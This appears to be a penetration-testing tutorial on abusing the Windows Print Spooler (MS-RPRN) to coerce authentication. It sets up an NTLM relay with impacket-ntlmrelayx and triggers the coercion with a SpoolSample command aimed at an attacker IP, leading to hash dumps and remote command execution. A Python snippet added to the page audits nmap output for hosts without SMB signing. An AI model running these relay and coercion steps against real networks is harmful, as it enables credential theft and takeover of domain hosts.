Exploiting authentication relay ~ Print Spooler Service
Resources
Print System Remote Protocol (MS-RPRN)
Print Spooler Service
Impacket scripts
SpoolSample exploitation script
A certain bug or "feature" in Microsoft Print System Remote Protocol (MS-RPRN) allows a domain user to remotely force a target host running the Print Spooler service to authenticate to an arbitrary IP address.
Note that the attack discussed below can be unstable: it may cause the Print Spooler service to crash, and its success varies.
To exploit this flaw, we need to meet the following requirements:
A valid set of AD account credentials
To have access to machines within the AD network, to perform required tasks in the other steps
Network connectivity to the target's SMB service
The target host must be running the Print Spooler service
The hosts involved must not have SMB signing enforced
The sections below discuss how to verify the requirements listed above.
#3 The target host must be running the Print Spooler service
We can utilize a few WMI queries from another machine on the network (with network connectivity to the target host) to query the current state:
PS> GWMI Win32_Printer -ComputerName <target>
# OR
PS> Get-PrinterPort -ComputerName <target>
Note that the success of this may vary, as Microsoft has been limiting the view on these ports from the network perspective.
#4 The hosts involved must not have SMB signing enforced
We can use nmap to enumerate the SMB signing enforcement on our target hosts:
$ nmap --script=smb2-security-mode -p445 <target1> <target2>
Ideally, we look for the following output: "Message signing enabled but not required".
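To turn the nmap check above into an audit over many hosts, here is an added Python example (not from the original page) that parses normal-format output of the smb2-security-mode script and lists the hosts where signing is enabled but not required. The embedded scan output is constructed, and the host names and addresses in it are placeholders.

```python
import re

# Constructed sample of normal-format output from
# `nmap --script=smb2-security-mode -p445 <hosts>` (not a real scan).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for dc01.corp.example (10.10.10.5)
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.20
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.30
445/tcp filtered microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (.+?)(?: \((\S+)\))?$")
VERDICT_RE = re.compile(r"^\|_?\s+(Message signing .+?)\s*$")

def parse_signing(nmap_output):
    """Map each scanned host to the script's verdict string, or None when
    the script produced no result (port closed/filtered, scan error)."""
    results, current = {}, None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            # Prefer the IP in parentheses when nmap printed a hostname first.
            current = m.group(2) or m.group(1)
            results[current] = None
            continue
        m = VERDICT_RE.match(line)
        if m and current:
            results[current] = m.group(1)
    return results

def relay_exposed(nmap_output):
    """Hosts whose SMB server accepts unsigned sessions and so would accept a
    relayed authentication; only 'enabled and required' counts as safe."""
    return sorted(h for h, v in parse_signing(nmap_output).items()
                  if v and ("not required" in v or "disabled" in v))
```

Hosts returned by relay_exposed are the ones where signing enforcement (a Group Policy setting on the SMB server side) should be turned on.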
Exploitation
From BloodHound, we may find a situation where one computer (machine account) has privileges over another computer, and the first computer is running the Print Spooler service that we can exploit. This means that we can coerce the first host to authenticate to the second host.
We can then perform an authentication relay attack to gain access to the second host as the machine account of our original target host. If that machine account has a dangerous privilege over the other host, we can exploit it further to gain more access.
First, we can use ntlmrelayx.py from impacket scripts to setup the NTLM relay:
This should be run from the attacker machine:
$ impacket-ntlmrelayx -smb2support -t smb://<TARGET_IP> -debug
TARGET_IP: the IP address of the second host, to which we want to relay the NTLM authentication. Note that we specify the IP address instead of the hostname because we want to prevent Kerberos authentication (which relies on the hostname) from happening.
Next, we have to coerce our target with the SpoolSample exploitation script:
C:\> SpoolSample.exe <target> <ATTACKER_IP>
<target>: hostname of the target host (from which we wish to coerce the authentication)
ATTACKER_IP: the IP address of our attacker machine from the first step
Once the coercion succeeds, we will have received an authentication attempt and a relay to the second host (from the ntlmrelayx impacket script on the attacker machine), as well as an automatic hash dump, which may provide us with credentials to get a shell on the host.
Optionally, we can supply the -c flag to ntlmrelayx.py to execute a command on the target system (for SMB and RPC).